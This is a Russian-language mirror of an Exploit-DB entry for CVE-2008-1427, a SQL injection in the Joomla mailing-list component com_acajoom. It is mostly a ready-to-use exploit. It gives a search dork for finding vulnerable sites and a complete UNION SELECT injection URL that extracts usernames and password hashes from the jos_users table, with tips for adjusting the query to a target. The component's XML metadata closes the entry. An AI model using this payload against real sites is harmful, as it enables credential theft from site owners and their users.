- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5273
- Проверка EDB
-
- Пройдено
- Автор
- FATAKU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1427
- Дата публикации
- 2008-03-18
Код:
###############################################
#
# Joomla Component com_acajoom SQL Injection
#
###############################################
#
# Author: fataku
#
# Mail : [email protected]
#
###############################################
#
# Dorks 1 : inurl:"com_acajoom" mailingid
#
###############################################
#
# Sploit:
#
# index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*
#
###############################################
#
# Note/Tip:
#
# jos_ prefix may need fixed
#
# it may differ the number id, try LIMIT/**/1,1/* instaed
#
###############################################
#
# Greetings:
#
# To all the guys at www.offensive-security.com
#
###############################################
side note:
<name>Acajoom</name>
<creationDate>January 2007</creationDate>
<author>Joobi Ltd</author>
<authorName>JoobiWeb</authorName>
<copyright>© 2006-2007 Joobi Ltd. All Rights Reserved.</copyright>
<license>http://www.acajoom.com/license.php</license>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.joobiweb.com</authorUrl>
<version>1.1.5</version>
<description>Acajoom is a mailing lists, newsletters, auto-responders, and follow up tool to communication effectively with your users and customers.
Your Communication partner!</description>
# milw0rm.com [2008-03-18]- Источник
- www.exploit-db.com
